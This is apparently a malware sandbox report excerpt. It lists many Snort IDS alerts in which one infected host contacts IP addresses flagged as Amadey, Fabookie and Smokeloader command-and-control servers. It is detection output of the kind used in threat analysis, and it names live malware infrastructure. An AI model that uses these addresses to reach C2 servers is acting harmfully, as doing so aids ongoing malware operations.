                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49934 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2851115 ETPRO TROJAN Win32/Fabookie.ek CnC Activity M2 192.168.2.4:49929 -> 45.66.159.18:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49935 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49936 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49938 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49939 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49940 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49941 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49943 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49944 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49946 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49947 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49948 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49951 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49950 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49952 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49953 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49956 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49955 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49957 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49958 -> 109.102.255.230:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49961 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49960 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49964 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49965 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49966 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49968 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49969 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49970 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49971 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49974 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49976 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49978 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49977 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49979 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49981 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49983 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49984 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:49980 -> 211.40.39.251:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49986 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49985 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49988 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49989 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2851115 ETPRO TROJAN Win32/Fabookie.ek CnC Activity M2 192.168.2.4:49987 -> 45.66.159.18:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49990 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49991 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49992 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49993 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49995 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49996 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49997 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49998 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50000 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49999 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50002 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50003 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:50001 -> 222.236.49.124:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50004 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50005 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50006 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50007 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50009 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50010 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50011 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50012 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50013 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50014 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2851815 ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18 192.168.2.4:50015 -> 200.46.66.71:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50017 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50016 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50020 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50019 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50021 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50023 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50024 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50025 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50026 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50027 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50028 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50029 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50030 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50031 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50032 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50034 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50035 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50040 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50037 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50041 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50042 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50044 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50043 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50046 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50045 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50048 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50049 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50050 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50052 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50053 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50054 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50057 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50055 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50056 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50059 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50058 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50060 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50062 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50061 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50064 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50063 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50066 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50067 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50065 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50069 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50068 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50073 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50071 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50072 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50074 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50075 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50076 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50077 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50079 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50080 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50078 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50081 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50082 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50084 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50083 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50085 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50086 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50087 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50089 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50088 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50092 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50091 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50093 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50094 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50096 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50095 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50097 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50098 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50101 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50100 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50099 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50102 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50103 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50104 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50107 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50105 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50106 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50109 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50108 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50111 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50110 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50112 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50113 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50115 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50116 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50114 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50118 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50117 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50120 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50121 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50119 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50122 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50123 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50124 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50127 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50125 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50126 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50128 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50129 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50131 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50130 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50132 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50133 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50134 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50136 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50135 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50137 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50138 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50142 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50141 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50140 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50145 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50146 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50148 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50150 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50149 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50151 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50152 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50154 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50153 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50155 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50156 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50157 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50159 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50158 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50160 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50162 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50165 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50164 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50163 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50167 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50168 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50172 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50173 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50169 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50174 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50176 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50177 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50179 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50180 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50178 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50182 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50181 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50185 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50183 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50184 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50186 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50187 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50189 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50188 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50190 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50191 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50192 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50194 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50193 -> 45.32.200.113:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50196 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50195 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50197 -> 45.66.230.123:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50198 -> 62.204.41.109:80
                                Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50200 -> 45.66.230.123:80
